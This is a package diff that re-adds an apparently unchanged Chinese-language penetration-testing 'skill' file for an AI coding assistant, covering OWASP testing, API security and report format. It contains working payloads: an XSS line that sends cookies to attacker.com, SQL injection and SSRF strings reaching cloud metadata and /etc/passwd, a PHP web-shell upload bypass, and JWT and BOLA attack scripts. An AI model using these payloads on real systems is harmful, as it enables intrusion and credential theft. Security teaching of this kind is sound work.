ccgx-workflow 1.0.0 → 1.0.2

package/templates/skills/domains/security/pentest.md

@@ -1,226 +1,226 @@
----
-name: pentest
-description: 全栈渗透测试。Web渗透、API安全、内网渗透、OWASP Top 10。当用户提到渗透测试、Web安全、API安全、漏洞挖掘、Burp、XSS、SQLi、SSRF、越权、BOLA时使用。
----
-
-# 🔥 赤焰秘典 · 渗透测试 (Penetration Testing)
-
-
-## 渗透测试流程
-
-```
-┌─────────────────────────────────────────────────────────────┐
-│                    渗透测试流程                               │
-├─────────────────────────────────────────────────────────────┤
-│  Phase 1: 信息收集                                           │
-│  ├─ 目标识别 → 技术栈指纹 → WAF检测 → 端口扫描              │
-│  └─ 目录扫描 → 参数发现 → JS分析                            │
-│                        ↓                                     │
-│  Phase 2: 漏洞扫描                                           │
-│  ├─ OWASP Top 10 全覆盖                                      │
-│  ├─ 技术栈特定漏洞                                           │
-│  └─ 业务逻辑漏洞                                             │
-│                        ↓                                     │
-│  Phase 3: 漏洞利用                                           │
-│  ├─ PoC验证 → 数据提取 → 权限提升                           │
-│  └─ 横向移动 → 持久化                                        │
-│                        ↓                                     │
-│  Phase 4: 报告输出                                           │
-│  └─ 按严重性分级 → 修复建议 → 复测验证                      │
-└─────────────────────────────────────────────────────────────┘
-```
-
-## OWASP Top 10 测试
-
-| 漏洞 | 测试方法 | Payload 示例 |
-|------|----------|--------------|
-| A01 访问控制 | IDOR、越权、JWT伪造 | 替换ID访问他人数据 |
-| A02 加密失败 | HTTPS、敏感数据明文 | 抓包分析 |
-| A03 注入 | SQLi、XSS、CMDi、SSTI | `' OR '1'='1` |
-| A04 不安全设计 | 业务逻辑漏洞 | 流程绕过 |
-| A05 配置错误 | 默认凭证、目录遍历 | `/admin` |
-| A06 脆弱组件 | CVE扫描 | Nuclei模板 |
-| A07 认证失败 | 弱密码、会话固定 | 爆破、重放 |
-| A08 数据完整性 | 反序列化 | 恶意对象 |
-| A09 日志不足 | 敏感信息泄露 | 错误信息 |
-| A10 SSRF | 内网探测 | `http://127.0.0.1` |
-
-## Web 渗透测试
-
-### XSS Payload
-```html
-<script>alert(1)</script>
-<img src=x onerror=alert(1)>
-<svg/onload=alert(1)>
-javascript:alert(1)
-<img src=x onerror="fetch('http://attacker.com/?c='+document.cookie)">
-```
-
-### SQL 注入
-```sql
--- 检测
-' OR '1'='1
-1' AND SLEEP(5)--
-1 UNION SELECT 1,2,3--
-
--- 数据提取
-1 UNION SELECT table_name,2 FROM information_schema.tables--
-1 UNION SELECT column_name,2 FROM information_schema.columns WHERE table_name='users'--
-```
-
-### SSRF Payload
-```
-http://127.0.0.1:80
-http://169.254.169.254/latest/meta-data/
-file:///etc/passwd
-gopher://127.0.0.1:6379/_*1%0d%0a$4%0d%0ainfo
-dict://127.0.0.1:6379/info
-```
-
-### 文件上传绕过
-```
-shell.php.jpg          # 双扩展名
-shell.phtml            # 替代扩展名
-shell.php%00.jpg       # 空字节截断
-shell.php/.            # 路径混淆
-Content-Type: image/jpeg  # MIME绕过
-GIF89a<?php system($_GET['cmd']);?>  # 文件头绕过
-```
-
-## API 安全测试
-
-### OWASP API Top 10
-
-| 风险 | 描述 | 测试方法 |
-|------|------|----------|
-| API1 BOLA | 对象级授权失效 | 替换ID访问他人数据 |
-| API2 认证失效 | 认证机制缺陷 | 弱Token、无限制 |
-| API3 属性级授权 | 返回过多数据 | 检查响应字段 |
-| API4 资源消耗 | 无速率限制 | 批量请求测试 |
-| API5 BFLA | 功能级授权失效 | 低权限调用高权限API |
-
-### BOLA 测试
-```python
-def test_bola(base_url, token):
-    """测试对象级授权漏洞"""
-    headers = {"Authorization": f"Bearer {token}"}
-    my_id = 100
-
-    for other_id in [1, 2, 99, 101, 999]:
-        resp = requests.get(f"{base_url}/api/users/{other_id}", headers=headers)
-        if resp.status_code == 200:
-            print(f"[VULN] BOLA: Can access user {other_id}")
-```
-
-### JWT 测试
-```python
-import jwt
-
-def test_jwt_vulns(token):
-    """JWT 常见漏洞测试"""
-    payload = jwt.decode(token, options={"verify_signature": False})
-
-    # 1. alg=none 绕过
-    none_token = jwt.encode(payload, None, algorithm="none")
-
-    # 2. 弱密钥测试
-    weak_secrets = ["secret", "password", "123456", "key"]
-    for secret in weak_secrets:
-        try:
-            jwt.decode(token, secret, algorithms=["HS256"])
-            print(f"[VULN] Weak secret: {secret}")
-        except: pass
-```
-
-### GraphQL 测试
-```graphql
-# 内省查询 - 获取 Schema
-{ __schema { types { name fields { name } } } }
-
-# 批量查询攻击
-query {
-  user1: user(id: 1) { email }
-  user2: user(id: 2) { email }
-}
-
-# 深度嵌套 DoS
-{ user(id: 1) { friends { friends { friends { name } } } } }
-```
-
-## 技术栈特定测试
-
-### Laravel/PHP
-```yaml
-critical_paths:
-  - /install              # CRITICAL - 安装漏洞
-  - /composer.json        # HIGH - 依赖泄露
-  - /.env                 # HIGH - 配置泄露
-  - /storage/logs         # MEDIUM - 日志泄露
-```
-
-### Spring Boot
-```yaml
-critical_paths:
-  - /actuator/env         # CRITICAL - 环境变量
-  - /actuator/heapdump    # CRITICAL - 内存转储
-  - /actuator/mappings    # HIGH - 路由泄露
-```
-
-### WordPress
-```yaml
-critical_paths:
-  - /wp-admin/install.php # CRITICAL - 重装漏洞
-  - /wp-config.php.bak    # HIGH - 配置备份
-  - /xmlrpc.php           # MEDIUM - 爆破入口
-```
-
-## 常用工具
-
-| 工具 | 用途 |
-|------|------|
-| Burp Suite | 代理抓包、漏洞扫描 |
-| sqlmap | SQL注入自动化 |
-| Nuclei | 漏洞模板扫描 |
-| ffuf | 目录/参数爆破 |
-| httpx | 批量探测 |
-| XSStrike | XSS检测 |
-| jwt_tool | JWT测试 |
-| Arjun | 参数发现 |
-
-## Burp Suite 技巧
-
-```
-# Intruder 爆破
-Payload: 字典/数字范围
-Position: 标记参数 §param§
-
-# Repeater 手动测试
-修改参数 → 发送 → 分析响应
-
-# 插件推荐
-- HaE (高亮敏感信息)
-- Autorize (越权检测)
-- JSON Beautifier
-```
-
-## 报告格式
-
-```markdown
-# 渗透测试报告
-
-## 🔴 CRITICAL
-### 1. SQL注入 - /api/users
-- **位置**: id 参数
-- **PoC**: `id=1' AND SLEEP(5)--`
-- **影响**: 数据库完全泄露
-- **修复**: 使用参数化查询
-
-## 🟠 HIGH
-...
-
-## 🟡 MEDIUM
-...
-```
-
----
-
+---
+name: pentest
+description: 全栈渗透测试。Web渗透、API安全、内网渗透、OWASP Top 10。当用户提到渗透测试、Web安全、API安全、漏洞挖掘、Burp、XSS、SQLi、SSRF、越权、BOLA时使用。
+---
+
+# 🔥 赤焰秘典 · 渗透测试 (Penetration Testing)
+
+
+## 渗透测试流程
+
+```
+┌─────────────────────────────────────────────────────────────┐
+│                    渗透测试流程                               │
+├─────────────────────────────────────────────────────────────┤
+│  Phase 1: 信息收集                                           │
+│  ├─ 目标识别 → 技术栈指纹 → WAF检测 → 端口扫描              │
+│  └─ 目录扫描 → 参数发现 → JS分析                            │
+│                        ↓                                     │
+│  Phase 2: 漏洞扫描                                           │
+│  ├─ OWASP Top 10 全覆盖                                      │
+│  ├─ 技术栈特定漏洞                                           │
+│  └─ 业务逻辑漏洞                                             │
+│                        ↓                                     │
+│  Phase 3: 漏洞利用                                           │
+│  ├─ PoC验证 → 数据提取 → 权限提升                           │
+│  └─ 横向移动 → 持久化                                        │
+│                        ↓                                     │
+│  Phase 4: 报告输出                                           │
+│  └─ 按严重性分级 → 修复建议 → 复测验证                      │
+└─────────────────────────────────────────────────────────────┘
+```
+
+## OWASP Top 10 测试
+
+| 漏洞 | 测试方法 | Payload 示例 |
+|------|----------|--------------|
+| A01 访问控制 | IDOR、越权、JWT伪造 | 替换ID访问他人数据 |
+| A02 加密失败 | HTTPS、敏感数据明文 | 抓包分析 |
+| A03 注入 | SQLi、XSS、CMDi、SSTI | `' OR '1'='1` |
+| A04 不安全设计 | 业务逻辑漏洞 | 流程绕过 |
+| A05 配置错误 | 默认凭证、目录遍历 | `/admin` |
+| A06 脆弱组件 | CVE扫描 | Nuclei模板 |
+| A07 认证失败 | 弱密码、会话固定 | 爆破、重放 |
+| A08 数据完整性 | 反序列化 | 恶意对象 |
+| A09 日志不足 | 敏感信息泄露 | 错误信息 |
+| A10 SSRF | 内网探测 | `http://127.0.0.1` |
+
+## Web 渗透测试
+
+### XSS Payload
+```html
+<script>alert(1)</script>
+<img src=x onerror=alert(1)>
+<svg/onload=alert(1)>
+javascript:alert(1)
+<img src=x onerror="fetch('http://attacker.com/?c='+document.cookie)">
+```
+
+### SQL 注入
+```sql
+-- 检测
+' OR '1'='1
+1' AND SLEEP(5)--
+1 UNION SELECT 1,2,3--
+
+-- 数据提取
+1 UNION SELECT table_name,2 FROM information_schema.tables--
+1 UNION SELECT column_name,2 FROM information_schema.columns WHERE table_name='users'--
+```
+
+### SSRF Payload
+```
+http://127.0.0.1:80
+http://169.254.169.254/latest/meta-data/
+file:///etc/passwd
+gopher://127.0.0.1:6379/_*1%0d%0a$4%0d%0ainfo
+dict://127.0.0.1:6379/info
+```
+
+### 文件上传绕过
+```
+shell.php.jpg          # 双扩展名
+shell.phtml            # 替代扩展名
+shell.php%00.jpg       # 空字节截断
+shell.php/.            # 路径混淆
+Content-Type: image/jpeg  # MIME绕过
+GIF89a<?php system($_GET['cmd']);?>  # 文件头绕过
+```
+
+## API 安全测试
+
+### OWASP API Top 10
+
+| 风险 | 描述 | 测试方法 |
+|------|------|----------|
+| API1 BOLA | 对象级授权失效 | 替换ID访问他人数据 |
+| API2 认证失效 | 认证机制缺陷 | 弱Token、无限制 |
+| API3 属性级授权 | 返回过多数据 | 检查响应字段 |
+| API4 资源消耗 | 无速率限制 | 批量请求测试 |
+| API5 BFLA | 功能级授权失效 | 低权限调用高权限API |
+
+### BOLA 测试
+```python
+def test_bola(base_url, token):
+    """测试对象级授权漏洞"""
+    headers = {"Authorization": f"Bearer {token}"}
+    my_id = 100
+
+    for other_id in [1, 2, 99, 101, 999]:
+        resp = requests.get(f"{base_url}/api/users/{other_id}", headers=headers)
+        if resp.status_code == 200:
+            print(f"[VULN] BOLA: Can access user {other_id}")
+```
+
+### JWT 测试
+```python
+import jwt
+
+def test_jwt_vulns(token):
+    """JWT 常见漏洞测试"""
+    payload = jwt.decode(token, options={"verify_signature": False})
+
+    # 1. alg=none 绕过
+    none_token = jwt.encode(payload, None, algorithm="none")
+
+    # 2. 弱密钥测试
+    weak_secrets = ["secret", "password", "123456", "key"]
+    for secret in weak_secrets:
+        try:
+            jwt.decode(token, secret, algorithms=["HS256"])
+            print(f"[VULN] Weak secret: {secret}")
+        except: pass
+```
+
+### GraphQL 测试
+```graphql
+# 内省查询 - 获取 Schema
+{ __schema { types { name fields { name } } } }
+
+# 批量查询攻击
+query {
+  user1: user(id: 1) { email }
+  user2: user(id: 2) { email }
+}
+
+# 深度嵌套 DoS
+{ user(id: 1) { friends { friends { friends { name } } } } }
+```
+
+## 技术栈特定测试
+
+### Laravel/PHP
+```yaml
+critical_paths:
+  - /install              # CRITICAL - 安装漏洞
+  - /composer.json        # HIGH - 依赖泄露
+  - /.env                 # HIGH - 配置泄露
+  - /storage/logs         # MEDIUM - 日志泄露
+```
+
+### Spring Boot
+```yaml
+critical_paths:
+  - /actuator/env         # CRITICAL - 环境变量
+  - /actuator/heapdump    # CRITICAL - 内存转储
+  - /actuator/mappings    # HIGH - 路由泄露
+```
+
+### WordPress
+```yaml
+critical_paths:
+  - /wp-admin/install.php # CRITICAL - 重装漏洞
+  - /wp-config.php.bak    # HIGH - 配置备份
+  - /xmlrpc.php           # MEDIUM - 爆破入口
+```
+
+## 常用工具
+
+| 工具 | 用途 |
+|------|------|
+| Burp Suite | 代理抓包、漏洞扫描 |
+| sqlmap | SQL注入自动化 |
+| Nuclei | 漏洞模板扫描 |
+| ffuf | 目录/参数爆破 |
+| httpx | 批量探测 |
+| XSStrike | XSS检测 |
+| jwt_tool | JWT测试 |
+| Arjun | 参数发现 |
+
+## Burp Suite 技巧
+
+```
+# Intruder 爆破
+Payload: 字典/数字范围
+Position: 标记参数 §param§
+
+# Repeater 手动测试
+修改参数 → 发送 → 分析响应
+
+# 插件推荐
+- HaE (高亮敏感信息)
+- Autorize (越权检测)
+- JSON Beautifier
+```
+
+## 报告格式
+
+```markdown
+# 渗透测试报告
+
+## 🔴 CRITICAL
+### 1. SQL注入 - /api/users
+- **位置**: id 参数
+- **PoC**: `id=1' AND SLEEP(5)--`
+- **影响**: 数据库完全泄露
+- **修复**: 使用参数化查询
+
+## 🟠 HIGH
+...
+
+## 🟡 MEDIUM
+...
+```
+
+---
+